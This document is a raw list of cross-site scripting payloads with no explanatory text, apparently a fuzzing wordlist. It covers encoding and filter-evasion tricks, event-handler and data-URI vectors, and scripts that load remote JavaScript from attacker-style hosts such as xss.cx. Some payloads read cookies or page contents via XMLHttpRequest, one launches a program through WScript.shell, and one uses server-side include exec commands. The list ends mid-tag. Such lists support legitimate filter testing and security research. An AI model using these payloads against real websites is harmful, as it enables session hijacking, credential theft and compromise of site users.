</HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-\n<HTML><BODY>\n<IFRAME SRC=\"javascript:confirm(5);\"></IFRAME>\n<IFRAME%20src='javascript:confirm%26%23x25;281)'>\n<![><IMG ALT=\"]><SCRIPT>confirm(1)</SCRIPT>\">\n<IMG ALT=\"><SCRIPT>confirm(1)</SCRIPT>\"(EOF)\n<IMG DYNSRC=\"javascript:confirm(document.location)\">\n<IMG LOWSRC=\"javascript:confirm(document.location)\">\n<IMG SRC=\" &#14;  javascript:confirm(document.location);\">\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=JaVaScRiPt:confirm(document.location)>\n<IMG SRC=JaVaScRiPt:confirm(&quot;XSS<WBR>&quot;)>\n<IMG SRC=JaVaScRiPt:prompt(document.location)> \n<IMG SRC=\"jav\tascript:confirm(document.location);\">\n<IMG SRC=java%00script:confirm(document.location)>\n<IMG SRC=`javascript:confirm(1)`>\n<IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>\n<IMG SRC=`javascript:confirm(document.cookie)`>\n<IMG SRC=\"javascript:confirm(document.location)\"\n<IMG SRC=\"javascript:confirm(document.location);\">\n<IMG SRC=javascript:confirm(document.location)>\n<IMG SRC=javascript:confirm(&quot;XSS&quot;)>\n<IMG SRC=javascript:prompt(document.location)>\n<IMG SRC=\"jav&#x09;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x09;ascript:confirm(document.location);\">\n<IMG SRC=\"jav&#x0A;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x0A;ascript:confirm(document.location);\">\n<IMG SRC=\"jav&#x0D;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x0D;ascript:confirm(document.location);\">\n<IMG SRC=\"livescript:[code]\">\n<IMG SRC=\"mocha:[code]\">\n<IMG SRC='vbscript:msgbox(document.location)'>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG STYLE=\"xss:expr/*XSS*/ession(confirm(document.location))\">\n<IMG onmouseover =confirm(1)>\n<IMG%0aSRC%0a=%0a\"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a\"%0a>\n<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>\n<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>\n<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:confirm(document.location);\">\n<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>\n<LINK REL=\"stylesheet\" HREF=\"http://xss.cx/xss.css\">\n<LINK REL=\"stylesheet\" HREF=\"javascript:confirm(document.location);\">\n&LT\n&LT;\n<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.cx/xss.css>; REL=stylesheet\">\n<META HTTP-EQUIV=\"Link\" Content=\"<javascript:confirm(document.location)>; REL=stylesheet\">\n<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;confirm(document.location)&lt;/SCRIPT&gt;\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:confirm(document.location);\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:confirm(document.location);\">\n<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://xss.cx/scriptlet.html\"></OBJECT>\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>\nPHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+\n<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>\n<SCR%00IPT>confirm(document.location)</SCR%00IPT>\n<SCRIPT SRC=\"http://xss.cx/xss.jpg\"></SCRIPT>\n<SCRIPT SRC=http://xss.cx/xss.js?<B>\n<SCRIPT SRC=http://xss.cx/xss.js></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT a=`>` SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#\n</SCRIPT>\">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>\n<SCRIPT/XSS SRC=\"http://xss.cx/xss.js\"></SCRIPT>\n<SCRIPT>a=document.cookie\n<SCRIPT>confirm(document.location);</SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.cx/xss.js\"></SCRIPT>\nSRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<STYLE TYPE=\"text/javascript\">confirm(document.location);</STYLE>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:confirm(document.location)\")}</STYLE>\n<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:confirm(document.location)\");}</STYLE><A CLASS=XSS></A>\n<STYLE>@import'http://xss.cx/xss.css';</STYLE>\n\"><STYLE>@import\"javascript:confirm(document.location)\";</STYLE>\n<STYLE>@im\\port'\\ja\\vasc\\ript:confirm(document.location)';</STYLE>\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n<TABLE BACKGROUND=\"javascript:confirm(document.location)\">\n&#X000003C\n&#X000003C;\n&#X000003E\n&#X000003E;\n&#X000003c\n&#X000003c;\n&#X000003e\n&#X000003e;\n&#X00003C\n&#X00003C;\n&#X00003E\n&#X00003E;\n&#X00003c\n&#X00003c;\n&#X00003e\n&#X00003e;\n&#X0003C\n&#X0003C;\n&#X0003E\n&#X0003E;\n&#X0003c\n&#X0003c;\n&#X0003e\n&#X0003e;\n&#X003C\n&#X003C;\n&#X003E\n&#X003E;\n&#X003c\n&#X003c;\n&#X003e\n&#X003e;\n&#X03C\n&#X03C;\n&#X03E\n&#X03E;\n&#X03c\n&#X03c;\n&#X03e\n&#X03e;\n&#X3C\n&#X3C;\n&#X3E\n&#X3E;\n&#X3c\n&#X3c;\n&#X3e\n&#X3e;\n<a  href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click  Me</a>\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<a data-remote=true data-method=delete href=/delete_account>CLICK</a>\n<a href=````>\n<a href=\"#\" onclick=\"confirm(' &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ')\">name</a>\n<a href='#' onmouseover =\"javascript:$('a').html(5)\">a link</a>\n<a href=\"// Í¥.ws\">CLICK\n<a href=[0x0b]\" onclick=confirm(1)//\">click</a>\n<a href=\"&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49\">Clickhere</a>\n<a href=``calc``>\n<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\n<a href=\"data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">click</a>\n<a href=\"data:text/html,%3cscript>confirm &#40;1&#41;&lt;/script&gt;\" >hello\n<a href=\"data:text/html;base64,PHN2Zyè¨9vbmxvæ™•YWQ<>>9YWxlc>>>nQoMSk+\">click</a>\n\"/><a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n<a href=\"data:text/html,<script>eval(name)</script>\" target=\"confirm(1)\">click</a>\n<a href=``explorer.exe``>\n<a href=\"invalid:1\" id=x name=y>test</a>\n\"/><a href=\"invalid:2\" id=x name=y>test</a>\n<a href=\"j&#00000000000000097vascript:window['confirm'](1)\">aa</a>\n<a href=\"jAvAsCrIpT&colon;confirm&lpar;1&rpar;\">X</a>\n<a href=\"jAvAsCrIpT&colon;confirm&lpar;1&rpar;\">X</a>\n<a href=\"javas&Tab;cri&NewLine;pt:confirm(1)\">test</a>\n<a href=\"//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0\">Right click open in new tab</a>\n\"/><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>\n\"><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>\n<a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click-XSS</a>\n\"><a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<a href=\"javascript:'hello'\" rel=\"sidebar\">x</a>\n<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:confirm(1)&NewLine;>X</a>\n<a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme\na href=\"j&#x26;#x26#x41;vascript:confirm%252831337%2529\">Hello</a>\n<a href=``mspaint.exe``>\n<a href=``notepad.exe``>\n<a href=``shell:System``>\n<a href='vbscript:\"&#x5c&quot&confirm(1)&#39&#39\"'>\n<a href=\"x:confirm(1)\" id=\"test\">click</a><script>eval(test+'')</script>\n<a href=``xss.cx``>\n<a id=\"x\" href='http://adspecs.yahoo.com/adspecs.php' target=\"close(/*grabcookie(1)*/)\">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>\n<a rel=\"noreferrer\" href=\"//xss.cx\">click</a>\n<a target=_blank href=\"data:text/html,<script>confirm(opener.document.body.innerHTML)</script>\">clickme in Opera/FF</a>\n<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E\n<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>\n<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>\n<a\"'%0A`= +%20>;test<a\"'%0A`= +%20>?test<a\"'%0A`= +%20>;#test<a\"'%0A`= +%20>;\n<a\"'%0A`= +%20>;test<a\"'%0A`= +%20>?test<a\"'%0A`= +%20>;&x=\"><img src=x onerror=prompt(1);>#\"><img src=x onerror=prompt(1);>test<a\"'%0A`= +%20>;\n<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\nabout://xss.cx\n<a/href[\\0C]=ja&Tab;vasc&Tab;ript&colon;confirm(1)>XXX</a>\n<a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>\n<a$href=\"data:text/html,%style=\"\"3cscript>confirm((1)</sstyle=\"\"cript>\" onerror=>hello\n<a/href=java&Tab;script:confirm%28/XSS/%29>click</a>\n<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6 C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>xss\n<a\u000b[\\x0B]onmosemove=confirm('\\Done\\')>\n<a[\\x0B]\u000bonmouseover\u000b=location=â€™jav\\x41script\\x3aconfirm\\x28â€³ZDresearchâ€\\x29â€²>ZDresearch\n<body language=vbs onload=confirm-1\n<body language=vbs onload=confirm-1\n<body language=vbs onload=confirm-1\n\"><body language=vbs onload=window.location='http://xss.cx'>\n<body onload='vbs:Set x=CreateObject(\"Msxml2.XMLHTTP\"):x.open\"GET\",\".\":x.send:MsgBox(x.responseText)'>\n<body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<body/onload=&lt;!--&gt;&#10confirm(1)>\n<body/onload=&lt;!--&gt;&#10confirm(1)>\n\"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\"\n\"\\\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\",\n<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\n><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>\n<button autofocus onfocus=confirm(2)>\n<button onclick=\"window.open('http://xss.cx/::Error138 ');\">CLICKME\n\"<button>'><img src=x onerror=confirm(0);></button>\"\n<button>'><img src=x onerror=confirm(0);></button>\ncharset=utf-\n'`\"><*chr*script>log(*num*)</script>\n<command onmouseover=\"javascript:confirm(0);\">Save //\n<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=\"customLog('*datahtmlelements* *dataevents*')\"></*datahtmlelements*>\n<*datahtmlelements* *dataevents*=\"javascript:parent.customLog('*datahtmlelements* *dataevents*')\"></*datahtmlelements*>\n<*datahtmlelements* *datahtmlattributes*=\"javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')\"></*datahtmlelements*>\n<div  style=\"position:absolute;top:0;left:0;width:100%;height:100%\"  onmouseover=\"prompt(1)\" onclick=\"confirm(1)\">x</button>?f\n<div contextmenu=x>right-click<menu id=x onshow=confirm(1)> \n<div id=\"confirm(2)\" style=\"x:expression(eval)(id)\">\n<div onmouseover='confirm&lpar;1&rpar;'>DIV</div>\n<div onmouseover='confirm&lpar;1&rpar;'>DIV</div>\n<div style=\"color:rgb(''&#0;x:expression(confirm(URL=1))\"></div>\n<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"confirm(1)\">x</button>\n<%div%20style=xss:expression(prompt(1))>\n<div/onmouseover='confirm(1)'> style=\"x:\">\n<div/onmouseover='confirm(1)'> style=\"x:\">\n<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>\n<div/style=\"width:expression(confirm(1))\">X</div>\n<embed code=\"http://xss.cx/xss.swf\" allowscriptaccess=always></embed>\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://xss.cx/xss.js></SCRIPT>'\"-->\nexp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\n</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\nfor(i=10;i>1;i--)confirm(i);new ActiveXObject(\"WScript.shell\").Run('calc.exe',1,true);\n<form action='data:text&sol;html,&lt;script&gt;confirm(1)&lt/script&gt'><button>CLICK\n<form action='java&Tab;scri&Tab;pt:confirm(1)'><button>CLICK\n<form action=\"javas&Tab;cript:confirm(1)\" method=\"get\"><input type=\"submit\" value=\"Submit\"></form>   \n<form id=\"myform\" value=\"\" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type=\"submit\" value=\"Absenden\"></form>\n<form name=location >\n<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X\n<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>\n<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>\n<form/action=javascript&#x0003A;eval(setTimeout(confirm(1)))><input/type=submit>\n//<form/action=javascript&#x3A;confirm&lpar;document&period;cookie&rpar;><input/type='submit'>//\n<form><button formaction=javascript&colon;confirm(1)>CLICKME\n<form><iframe &#09;&#10;&#11; src=\"javascript&#58;confirm(1)\"&#11;&#10;&#09;;>\n<form><input type=submit formaction=//xss.cx><textarea name=x>\n<form><isindex formaction=\"javascript&colon;confirm(1)\"\n<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n<frameset><frame/src=//xss.cx> \n&gt\n&gt;\nhttp://www.google<script .com>confirm(document.location)</script\nhttp://www.<script abc>setTimeout('confirm(1)',1)</script .com>\nhttp://www.<script>confirm(1)</script .com\n<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->\n<!--[if<img src=x:x onerror=confirm(5)//]-->\n<iframe  src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?\n<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<iframe %00 src=\"&Tab;javascript:prompt(1)&Tab;\"%00>\n<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); confirm(Safe.get());</script>\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>\n<iframe src=\"\" onmouseover=\"confirm(document.cookie)\">\n<iframe src=\"#\" style=width:exp/**/ressi/**/on(confirm(1))>\n<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=\"data:D,<script>confirm(top.document.body.innerHTML)</script>\">\n<iframe src=\"data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E\"></iframe>\n<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n<iframe srcdoc='&lt;svg/onload=confirm(3)&gt;'>\n<iframe srcdoc=\"<svg/onload=confirm(domain)>\">\n<iframe src=\"http://xss.cx?x=<iframe name=x></iframe>\"></iframe><a href=\"http://xss.ms\" target=x id=x></a><script>window.onload=function(){x.click()}</script>\n<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<iframe src=javascript&colon;confirm&lpar;document&period;location&rpar;>\n<iframe src=\"javascript:'<script src=http://xss.cx ></script>'\"></iframe>\n\"><iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<iframe width=0 height=0 src=\"javascript:confirm(1)\">\n<iframe/%00/ src=javaSCRIPT&colon;confirm(1)\n\"><iframe%20src=\"http://google.com\"%%203E\niframe.contentWindow.location.constructor.prototype\n<iframe><iframe 